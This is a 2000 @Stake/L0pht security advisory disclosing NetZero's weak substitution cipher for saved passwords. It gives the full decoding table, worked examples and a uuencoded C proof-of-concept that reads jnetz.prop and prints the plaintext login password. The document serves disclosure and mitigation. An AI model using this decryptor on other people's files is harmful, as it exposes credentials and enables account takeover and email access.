@Stake Inc.
L0pht Research Labs
www.atstake.com www.L0pht.com
Security Advisory
Advisory Name: NetZero Password Encryption Algorithm
Release Date: 07.18.2000
Application: NetZero V3.0 and earlier
Platform: Microsoft Windows 95, 98, NT, 2000
Severity: Low. Passwords can be easily decrypted by
exploiting NetZero's encryption algorithm
Author: Brian Carrier [bcarrier@atstake.com]
Vendor Status: Vendor Contacted 6.19.00
Web: http://www.L0pht.com/advisories.html
Forward:
It is unfortunately common practice that applications which allow
users to remember their passwords as a convenience rarely encrypt them
but instead opt to simply obfuscate them. This does not alter the fact
that user perception and expectation, for the majority of users at least,
is often incorrectly set. Often times convenience eschews security in
these products.
There are dozens of applications available that make this same mistake.
This advisory is not an attempt to single one vendor out but rather
continue to remind of the common problem of storing secrets and the
reliance of simple obfuscation. If effort is taken to obfuscate or hide
something then it must have been seen as valuable to someone. If not,
why bother? Much the way buffer overflows abound so do simple obfuscation
mechanisms. As such, it is important to continue to bring them to light.
Unfortunately it is often the case that the average user places
as much trust in these as stronger systems through the apparent similarity
in user interface. As suggested by Aleph1, the MS CryptoAPI
CryptoProectetData() and CryptUnprotectData() functions currently allow
applications to store secrets encrypted, based on the user's credentials.
Therefore, since the methods currently exist for secure data storage, they
should be utilized by all applications to provide users with a consistent
level of protection.
This advisory is designed to help people see ways of looking at, and
for, these sorts of problems. Or even in being aware of the situation,
to view it as a non-problem. Teaching someone to fish rather than simply
providing one meal. Enjoy the classical substitution cipher :)
Overview:
NetZero is a service that provides free Internet access to customers
in exchange for the permission to advertise. NetZero's users log into the
network with a login and password that are saved in an ASCII text file on
the users system. This advisory addresses a weak encryption algorithm
that is used to protect the password from unauthorized access.
In order for a NetZero account to be compromised, an attacker must
have access to the machine or use another vulnerability to read the file.
Once access is obtained, the attacker can easily determine the user's
NetZero login and password in less than a seconds time. Once the login
and password have been determined, the attacker can read the users email
and attack other systems under the users identity.
This is a common problem in many services of this type. One quick
solution to at least minimize the problem, should this risk be deemed
unacceptable, is to disable the _Save Password_ option.
Detailed Description:
The login and password that are required to log into the NetZero
network are stored in an ASCII file, id.dat, in the NetZero directory.
If the user chooses to have the application save the password, then
jnetz.prop also contains the login and password. The password in both
files is encrypted using a variation of a simple substitution cipher.
The classical substitution cipher is a 1-to-1 mapping between
characters where each plaintext character is replaced by one ciphertext
character. For example, let P_i be the plaintext character in location
'i' and C_j be the ciphertext character in location 'j', then C_i is the
character that P_i maps to.
The NetZero substitution cipher replaces each plaintext character by
two ciphertext characters, but the two ciphertext characters are not
stored together. When substituting character P_i of a password of length
'n', the first ciphertext character is C_i and the second character is
C_n+i.
The two ciphertext characters are derived from the following table:
| 1 a M Q f 7 g T 9 4 L W e 6 y C
--+----------------------------------
g | ` a b c d e f g h i j k l m n o
T | p q r s t u v w x y z { | } ~
f | @ A B C D E F G H I J K L M N O
7 | P Q R S T U V W X Y Z [ \ ] ^ _
Q | 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
M | SP ! " # $ % & ' ( ) * + , - . /
The characters inside the table represent the ASCII plaintext characters
and SP represents a space.
When encrypting a string, P, of length 'n', find each character in the
table and place the column header into C_i and place the row header into
C_n+i.
For example:
E(a) = ag
E(aa) = aagg
E(aqAQ1!) = aaaaaagTf7QM
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg
When decrypting a string, C, of length '2n', then P_i will be the
element in the above table where the column headed by C_i and the row
headed by C_n+i intersect.
For example:
D(af) = A
D(aaff) = AA
D(aaMMQQfgfgfg) = AaBbCc
Temporary Solution:
Exploitation of this vulnerability is only possible once an attacker
has gained access to the id.dat or jnetz.prop files. Therefore, NetZero
users should not have the application save their password and they should
delete the id.dat file every time they start the application.
Vendor Response:
Vendor has acknowledged receipt of the advisory and has not provided
a response as to any actions they intend to take.
Proof-of-Concept Code:
The following code will demonstrate that the password is easily
decrypted. Simply uudecode, compile, and run in a directory that contains
jnetz.prop.
begin 666 netzero.c
M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QS=')I;F<N:#X*"B-D969I
M;F4@54E$7U-)6D4)-C0*(V1E9FEN92!005-37T-)4$A%4E]325I%"3$R. HC
M9&5F:6YE(%!!4U-?4$Q!24Y?4TE:10DV- HC9&5F:6YE($)51E]325I%(#(U
M-@H*8V]N<W0@8VAA<B!D96-486)L95LV75LQ-ET@/2!["B @>R=@)RPG82<L
M)V(G+"=C)RPG9"<L)V4G+"=F)RPG9R<L)V@G+"=I)RPG:B<L)VLG+"=L)RPG
M;2<L)VXG+"=O)WTL"B @>R=P)RPG<2<L)W(G+"=S)RPG="<L)W4G+"=V)RPG
M=R<L)W@G+"=Y)RPG>B<L)WLG+"=\)RPG?2<L)WXG+#!]+ H@('LG0"<L)T$G
M+"=")RPG0R<L)T0G+"=%)RPG1B<L)T<G+"=()RPG22<L)THG+"=+)RPG3"<L
M)TTG+"=.)RPG3R=]+ H@('LG4"<L)U$G+"=2)RPG4R<L)U0G+"=5)RPG5B<L
M)U<G+"=8)RPG62<L)UHG+"=;)RPG7%PG+"==)RPG7B<L)U\G?2P*("![)S G
M+"<Q)RPG,B<L)S,G+"<T)RPG-2<L)S8G+"<W)RPG."<L)SDG+"<Z)RPG.R<L
M)SPG+"<])RPG/B<L)S\G?2P*("![)R G+"<A)RPG(B<L)R,G+"<D)RPG)2<L
M)R8G+"=<)R<L)R@G+"<I)RPG*B<L)RLG+"<L)RPG+2<L)RXG+"<O)WT*?3L*
M"FEN="!N>E]D96-R>7!T*&-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?
M4TE:15TL( H@(&-H87(@8U!L86EN4&%S<UM005-37U!,04E.7U-)6D5=*0I[
M"@EI;G0@<&%S<TQE;BP@:2P@:61X,2P@:61X,CL*"7!A<W-,96X@/2!S=')L
M96XH8T-I<&AE<E!A<W,I+S(["@D*"6EF("AP87-S3&5N(#X@4$%34U]03$%)
M3E]325I%*0H)>PH)"7!R:6YT9B@B17)R;W(Z(%!L86EN('1E>'0@87)R87D@
M=&]O('-M86QL7&XB*3L*"0ER971U<FX@,3L*"7T*"@EF;W(@*&D@/2 P.R!I
M(#P@<&%S<TQE;CL@:2LK*0H)>PH)"7-W:71C:"AC0VEP:&5R4&%S<UMI72D*
M"0E["@D)8V%S92 G,2<Z"@D)"6ED>#(@/2 P.R!B<F5A:SL*"0EC87-E("=A
M)SH*"0D):61X,B ](#$[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@R(#T@
M,CL@8G)E86L["@D)8V%S92 G42<Z"@D)"6ED>#(@/2 S.R!B<F5A:SL*"0EC
M87-E("=F)SH*"0D):61X,B ](#0[(&)R96%K.PH)"6-A<V4@)S<G.@H)"0EI
M9'@R(#T@-3L@8G)E86L["@D)8V%S92 G9R<Z"@D)"6ED>#(@/2 V.R!B<F5A
M:SL*"0EC87-E("=4)SH*"0D):61X,B ](#<[(&)R96%K.PH)"6-A<V4@)SDG
M.@H)"0EI9'@R(#T@.#L@8G)E86L["@D)8V%S92 G-"<Z"@D)"6ED>#(@/2 Y
M.R!B<F5A:SL*"0EC87-E("=,)SH*"0D):61X,B ](#$P.R!B<F5A:SL*"0EC
M87-E("=7)SH*"0D):61X,B ](#$Q.R!B<F5A:SL*"0EC87-E("=E)SH*"0D)
M:61X,B ](#$R.R!B<F5A:SL*"0EC87-E("<V)SH*"0D):61X,B ](#$S.R!B
M<F5A:SL*"0EC87-E("=Y)SH*"0D):61X,B ](#$T.R!B<F5A:SL*"0EC87-E
M("=#)SH*"0D):61X,B ](#$U.R!B<F5A:SL*"0ED969A=6QT.@H)"0EP<FEN
M=&8H(D5R<F]R.B!5;FMN;W=N($-I<&AE<B!497AT(&EN9&5X.B E8UQN(BP@
M8T-I<&AE<E!A<W-;:5TI.PH)"0ER971U<FX@,3L*"0D)8G)E86L["@D)?0H*
M"0ES=VET8V@H8T-I<&AE<E!A<W-;:2MP87-S3&5N72D*"0E["@D)8V%S92 G
M9R<Z"@D)"6ED>#$@/2 P.R!B<F5A:SL*"0EC87-E("=4)SH*"0D):61X,2 ]
M(#$[(&)R96%K.PH)"6-A<V4@)V8G.@H)"0EI9'@Q(#T@,CL@8G)E86L["@D)
M8V%S92 G-R<Z"@D)"6ED>#$@/2 S.R!B<F5A:SL*"0EC87-E("=1)SH*"0D)
M:61X,2 ](#0[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@Q(#T@-3L@8G)E
M86L["@D)9&5F875L=#H*"0D)<')I;G1F*")%<G)O<CH@56YK;F]W;B!#:7!H
M97(@5&5X="!3970Z("5C7&XB+" *"0D)("!C0VEP:&5R4&%S<UMI*W!A<W-,
M96Y=*3L*"0D)<F5T=7)N(#$["@D)"6)R96%K.PH)"7T*"@D)8U!L86EN4&%S
M<UMI72 ](&1E8U1A8FQE6VED>#%=6VED>#)=.PH)?0H)8U!L86EN4&%S<UMI
M72 ](# ["@H)<F5T=7)N(# ["GT*"FEN="!M86EN*'9O:60I"GL*"49)3$4@
M*FA087)A;7,["@EC:&%R(&-"=69F97);0E5&7U-)6D5=+"!C54E$6U5)1%]3
M25I%73L*"6-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?4TE:15TL(&-0
M;&%I;E!A<W-;4$%34U]03$%)3E]325I%73L*"6EN="!D;VYE(#T@,CL*"@EP
M<FEN=&8H(EQN3F5T(%IE<F\@4&%S<W=O<F0@1&5C<GEP=&]R7&XB*3L*"7!R
M:6YT9B@B0G)I86X@0V%R<FEE<B!;8F-A<G)I97) 871S=&%K92YC;VU=7&XB
M*3L*"7!R:6YT9B@B0%-T86ME($PP<&AT(%)E<V5A<F-H($QA8G-<;B(I.PH)
M<')I;G1F*")H='1P.B\O=W=W+F%T<W1A:V4N8V]M7&Y<;B(I.PH*"6EF("@H
M:%!A<F%M<R ](&9O<&5N*")J;F5T>BYP<F]P(BPB<B(I*2 ]/2!.54Q,*0H)
M>PH)"7!R:6YT9B@B56YA8FQE('1O(&9I;F0@:FYE='HN<')O<"!F:6QE7&XB
M*3L*"0ER971U<FX@,3L*"7T)"@H)=VAI;&4@*"AF9V5T<RAC0G5F9F5R+"!"
M549?4TE:12P@:%!A<F%M<RD@(3T@3E5,3"D@)B8@*&1O;F4@/B P*2D*"7L*
M"0EI9B H<W1R;F-M<"AC0G5F9F5R+" B4')O9E5)1#TB+" X*2 ]/2 P*0H)
M"7L*"0D)9&]N92TM.PH)"0ES=')N8W!Y*&-5240L(&-"=69F97(@*R X+"!5
M241?4TE:12D["@D)"7!R:6YT9B@B57-E<DE$.B E<R(L(&-5240I.PH)"7T*
M"@D):68@*'-T<FYC;7 H8T)U9F9E<BP@(E!R;V905T0](BP@."D@/3T@,"D*
M"0E["@D)"61O;F4M+3L*"0D)<W1R;F-P>2AC0VEP:&5R4&%S<RP@8T)U9F9E
M<B K(#@L(%!!4U-?0TE02$527U-)6D4I.PH)"0EP<FEN=&8H(D5N8W)Y<'1E
M9"!087-S=V]R9#H@)7,B+"!C0VEP:&5R4&%S<RD["@H)"0EI9B H;GI?9&5C
M<GEP="AC0VEP:&5R4&%S<RP@8U!L86EN4&%S<RD@(3T@,"D*"0D)"7)E='5R
M;B Q.PH)"0EE;'-E"@D)"0EP<FEN=&8H(E!L86EN(%1E>'0@4&%S<W=O<F0Z
M("5S7&XB+"!C4&QA:6Y087-S*3L*"0E]"@H)?0H*"69C;&]S92AH4&%R86US
M*3L*"@EI9B H9&]N92 ^(# I"@E["@D)<')I;G1F*"));G9A;&ED(&IN971Z
M+G!R;W @9FEL95QN(BD["@D)<F5T=7)N(#$["@E](&5L<V4@>PH)"7)E='5R
*;B P.PH)?0I]"EQN
end
bcarrier@atstake.com